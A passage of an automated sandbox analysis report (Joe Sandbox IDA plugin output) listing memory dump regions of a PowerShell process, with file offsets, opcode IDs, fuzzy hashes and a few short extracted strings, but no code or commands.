                                                                                                                      • Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 98bd45ccd00079291947c19a00a6cde2fca6a7368bf913b20ef540bc538b5316
                                                                                                                      • Instruction ID: ad463c60b7f81fd51e9b1d3b82e0d9c5419133a1f8a5bd73878053ae75d9b9f0
                                                                                                                      • Opcode Fuzzy Hash: 98bd45ccd00079291947c19a00a6cde2fca6a7368bf913b20ef540bc538b5316
                                                                                                                      • Instruction Fuzzy Hash: F23137A2B4EF8B8BE3AABE3C895127965C9FF44320B7401F9D46DE70E3DD0898004241
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5f122451df860508560712c9b7ae7efb73a0449a06e7979267664dabed64a767
                                                                                                                      • Instruction ID: 2b1fc586ba4ad193d53237e516d4f9c66293fe83823d2e5f0340612ff5dee2e9
                                                                                                                      • Opcode Fuzzy Hash: 5f122451df860508560712c9b7ae7efb73a0449a06e7979267664dabed64a767
                                                                                                                      • Instruction Fuzzy Hash: 7A21F776B0CA1A8FEBA5BD6CE4065F8B3D1FB94210B3842F7C469C3182DD09AC154380
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9632633544207a03bf66228bd3f3efa9132d720497aaec3b6aae6f863c3c494d
                                                                                                                      • Instruction ID: bbd47f5e2270dd9e2ec73224671c7a404b5523ce4c2d95e459676fcb902a408b
                                                                                                                      • Opcode Fuzzy Hash: 9632633544207a03bf66228bd3f3efa9132d720497aaec3b6aae6f863c3c494d
                                                                                                                      • Instruction Fuzzy Hash: 462106A3E5FB854BE3A57E7CB9121B4A5C5FF8171077901FAD4ACC3183EC29AC064186
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: uT_I$xI_L$yI_L$~T_I
                                                                                                                      • API String ID: 0-1747203710
                                                                                                                      • Opcode ID: e2a488a603da00c34d8cf8791765ba249ca855343ee9cd3678d44ade1d0530ce
                                                                                                                      • Instruction ID: 76d564657e3fcf444ade445e75bf5a6b7bc6388da93d9f71aef7a6a23107664d
                                                                                                                      • Opcode Fuzzy Hash: e2a488a603da00c34d8cf8791765ba249ca855343ee9cd3678d44ade1d0530ce
                                                                                                                      • Instruction Fuzzy Hash: 89E2F0B1A1CA1A8FE7A8FE2CC555A7477D5FF64300BB401F9C06ED7192DD28AC429781
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: \K_H
                                                                                                                      • API String ID: 0-2574550302
                                                                                                                      • Opcode ID: 6d1d88be4669bdcbf5f21dc241620772b33dd7840682d1c212765126789b2398
                                                                                                                      • Instruction ID: 9c0119f9f4aa61fbb89b44f0061d876bcb560874c9df3274ff1b7df4a54af053
                                                                                                                      • Opcode Fuzzy Hash: 6d1d88be4669bdcbf5f21dc241620772b33dd7840682d1c212765126789b2398
                                                                                                                      • Instruction Fuzzy Hash: EE428071B1CE499FEB94EF2CD845AAA77E1FF98350F1401B9E44EC3296DE24E8418781
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf7b02c92bf14272ae8a814e251e75fe6af8ecb9a25468571c0842171dd3f480
                                                                                                                      • Instruction ID: cb61122d8fcfcde237e7962338a41e58e61ab67736bf9dc17d68fd9e88b97b9f
                                                                                                                      • Opcode Fuzzy Hash: bf7b02c92bf14272ae8a814e251e75fe6af8ecb9a25468571c0842171dd3f480
                                                                                                                      • Instruction Fuzzy Hash: 81D128B7B0C6564BE355BE3CE4511EA3B94EF84335B1401BBE48ECB193DE14B84786A0